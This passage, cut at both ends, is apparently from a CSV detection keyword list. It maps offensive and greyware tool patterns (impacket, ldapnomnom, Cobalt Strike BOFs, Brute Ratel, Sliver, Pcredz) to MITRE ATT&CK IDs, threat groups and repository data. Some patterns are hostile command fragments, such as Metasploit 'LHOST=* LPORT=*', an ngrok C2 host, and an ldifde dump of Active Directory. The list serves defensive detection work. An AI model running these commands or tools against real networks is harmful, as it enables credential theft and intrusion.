SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*ldapdomaindump*,offensive_tool_keyword,ldapdomaindump,Active Directory information dumper via LDAP,T1087 - T1005 - T1016,TA0007,N/A,N/A,Credential Access,https://github.com/dirkjanm/ldapdomaindump,1,1,N/A,N/A,10,970,176,2023-09-06T05:50:30Z,2016-05-24T18:46:56Z -*LDAPDomainDump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*ldapfilter:*admincount=1* /format:hashcat*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*LdapMiner*,offensive_tool_keyword,ldapminer,This is a tool I wrote to collect information from different LDAP Server implementation. This was written in C with the Netscape C,T1016 - T1018 - T1021 - T1046 - T1056 - T1069 - T1078 - T1087 - T1114 - T1482 - T1526 - T1597,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Information Gathering,https://sourceforge.net/projects/ldapminer/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ldapnomnom --input*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,0,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -*ldapnomnom*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,1,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -*ldapnomnom-darwin-*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,1,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z 
-*ldapnomnom-linux-*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,1,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -*ldapnomnom-main*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,1,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -*ldapnomnom-windows-386.exe*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,1,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -*ldapnomnom-windows-amd64.exe*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,1,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -*ldapnomnom-windows-arm64.exe*,offensive_tool_keyword,ldapnomnom,Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP),T1110.003 - T1205,TA0001 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/lkarlslund/ldapnomnom,1,1,N/A,N/A,7,697,60,2023-03-31T16:18:14Z,2022-09-18T10:35:09Z -*LDAP-Password-Hunter*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/oldboy21/LDAP-Password-Hunter,1,1,N/A,10,2,189,27,2023-01-06T15:32:34Z,2021-07-26T14:27:01Z -*ldaprelayclient.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,1,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*ldaprelayclient.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*LdapRelayScan.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*LdapRelayScan.py*,offensive_tool_keyword,LdapRelayScan,Check for LDAP protections regarding the relay of NTLM authentication,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/zyn3rgy/LdapRelayScan,1,1,N/A,N/A,4,389,51,2023-09-04T05:43:00Z,2022-01-16T06:50:44Z -*LdapRelayScan-main*,offensive_tool_keyword,LdapRelayScan,Check for LDAP protections regarding the relay of NTLM authentication,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/zyn3rgy/LdapRelayScan,1,1,N/A,8,4,389,51,2023-09-04T05:43:00Z,2022-01-16T06:50:44Z -*ldapsearch * ldap://*,greyware_tool_keyword,ldapsearch,ldapsearch to enumerate ldap,T1018 - T1087 - T1069,TA0007 - TA0002 - TA0008,N/A,N/A,Reconnaissance,https://man7.org/linux/man-pages/man1/ldapsearch.1.html,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*ldapsearch -x -h * -s base*,greyware_tool_keyword,ldapsearch,ldapsearch to enumerate ldap,T1018 - T1087 - T1069,TA0007 - TA0002 - TA0008,N/A,N/A,Reconnaissance,https://man7.org/linux/man-pages/man1/ldapsearch.1.html,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*ldapsearchad.py*,offensive_tool_keyword,ldapsearch-ad,Python3 
script to quickly get various information from a domain controller through his LDAP service.,T1018 - T1087 - T1069,TA0007 - TA0002 - TA0008,N/A,N/A,Reconnaissance,https://github.com/yaap7/ldapsearch-ad,1,1,N/A,N/A,2,123,26,2023-05-10T13:30:16Z,2019-12-08T00:25:57Z -*ldapsearch-ad.py*,offensive_tool_keyword,ldapsearch-ad,Python3 script to quickly get various information from a domain controller through his LDAP service.,T1018 - T1087 - T1069,TA0007 - TA0002 - TA0008,N/A,N/A,Reconnaissance,https://github.com/yaap7/ldapsearch-ad,1,1,N/A,N/A,2,123,26,2023-05-10T13:30:16Z,2019-12-08T00:25:57Z -*ldap-searcher *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*ldapsentinel * raw *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*ldapsentinel forest user*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 
- T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*LdapSignCheck.exe*,offensive_tool_keyword,cobaltstrike,Beacon Object File & C# project to check LDAP signing,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cube0x0/LdapSignCheck,1,1,N/A,10,10,148,22,2022-10-25T13:36:43Z,2022-02-24T20:25:31Z -*LdapSignCheck.Natives*,offensive_tool_keyword,cobaltstrike,Beacon Object File & C# project to check LDAP signing,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 
- T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cube0x0/LdapSignCheck,1,1,N/A,10,10,148,22,2022-10-25T13:36:43Z,2022-02-24T20:25:31Z -*LdapSignCheck.sln*,offensive_tool_keyword,cobaltstrike,Beacon Object File & C# project to check LDAP signing,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cube0x0/LdapSignCheck,1,1,N/A,10,10,148,22,2022-10-25T13:36:43Z,2022-02-24T20:25:31Z -*ldapsigncheck.x64.*,offensive_tool_keyword,cobaltstrike,Beacon Object File & C# project to check LDAP signing,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cube0x0/LdapSignCheck,1,1,N/A,10,10,148,22,2022-10-25T13:36:43Z,2022-02-24T20:25:31Z -*ldapsigncheck.x86.*,offensive_tool_keyword,cobaltstrike,Beacon Object File & C# project to check LDAP signing,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cube0x0/LdapSignCheck,1,1,N/A,10,10,148,22,2022-10-25T13:36:43Z,2022-02-24T20:25:31Z -*LDAPWordlistHarvester.ps1*,offensive_tool_keyword,LDAPWordlistHarvester,A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.,T1210.001 - T1087.003 - T1110,TA0001 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/p0dalirius/LDAPWordlistHarvester,1,1,N/A,5,3,218,14,2023-10-01T21:12:10Z,2023-09-22T10:10:10Z -*LDAPWordlistHarvester.py*,offensive_tool_keyword,LDAPWordlistHarvester,A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.,T1210.001 - T1087.003 - T1110,TA0001 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/p0dalirius/LDAPWordlistHarvester,1,1,N/A,5,3,218,14,2023-10-01T21:12:10Z,2023-09-22T10:10:10Z -*LDAPWordlistHarvester-main*,offensive_tool_keyword,LDAPWordlistHarvester,A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.,T1210.001 - T1087.003 - T1110,TA0001 - TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/p0dalirius/LDAPWordlistHarvester,1,1,N/A,5,3,218,14,2023-10-01T21:12:10Z,2023-09-22T10:10:10Z -*ldd2bloodhound*,offensive_tool_keyword,ldapdomaindump,Active Directory information dumper via LDAP,T1087 - T1005 - T1016,TA0007,N/A,N/A,Credential Access,https://github.com/dirkjanm/ldapdomaindump,1,1,N/A,N/A,10,970,176,2023-09-06T05:50:30Z,2016-05-24T18:46:56Z -*ldeep cache *,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,0,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -*ldeep ldap -u *,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 
T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,0,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -*ldeep*activedirectory.py*,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,1,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -*ldeep*ldap_activedirectory.py*,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,1,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -*ldeep_dump_users_enabled.json,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,1,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -*ldeep_dump_users_enabled.lst,offensive_tool_keyword,ldeep,In-depth ldap enumeration utility,T1589 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,1,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -*ldeep_enum*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*ldif2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*ldifde.exe -f *\temp\*.txt -p subtree*,greyware_tool_keyword,ldifde,using ldifde.exe to export data from Active Directory to a .txt file in the Temp directory,T1018 - T1005 - T1077.001,TA0007 - TA0005 - TA0002,N/A,Volt 
Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*leaky/leakbuf.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*leapsecurity*,offensive_tool_keyword,Github Username,github repo name hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/leapsecurity,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*legalhackers.com/exploits/CVE*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*lejgfmmlngaigdmmikblappdafcmkndb*,greyware_tool_keyword,uVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*lem0nSec/ShellGhost*,offensive_tool_keyword,ShellGhost,A memory-based evasion technique which makes shellcode invisible from process start to end,T1055.012 - T1027.002 - T1055.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/lem0nSec/ShellGhost,1,1,N/A,N/A,9,892,102,2023-07-24T12:22:32Z,2023-07-01T16:56:58Z -*lengjibo/FourEye*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - 
TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,1,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*Leo4j/Invoke-SMBRemoting*,offensive_tool_keyword,Invoke-SMBRemoting,Interactive Shell and Command Execution over Named-Pipes (SMB),T1059 - T1021.002 - T1572,TA0002 - TA0008 - TA0011,N/A,N/A,Lateral Movement,https://github.com/Leo4j/Invoke-SMBRemoting,1,1,N/A,9,1,22,4,2023-10-02T10:21:34Z,2023-09-06T16:00:47Z -*LetMeOutSharp.*,offensive_tool_keyword,cobaltstrike,Project to enumerate proxy configurations and generate shellcode from CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/AggressiveProxy,1,1,N/A,10,10,139,26,2020-11-04T16:08:11Z,2020-11-04T12:53:00Z -*LFI scanner checks.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation 
tools,https://github.com/Mr-xn/BurpSuite-collections,1,0,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*lgandx/Pcredz*,offensive_tool_keyword,Pcredz,This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.,T1116 - T1003 - T1002 - T1001 - T1005 - T1552,TA0003 - TA0002 - TA0011,N/A,N/A,Credential Access,https://github.com/lgandx/Pcredz,1,1,N/A,N/A,10,1771,383,2022-11-07T14:15:02Z,2014-04-07T02:03:33Z -*LHOST=* LPORT=*,offensive_tool_keyword,metasploit,metasploit command lines patterns,T1573.002 - T1043 - T1021,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation Tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*LHOST=0.tcp.ngrok.io*,greyware_tool_keyword,ngrok,ngrok - abused by attackers for C2 usage,T1090 - T1095 - T1008,TA0011 - TA0002 - TA0004,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*liamg/traitor*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*lib/Bruteforcer.cs*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense 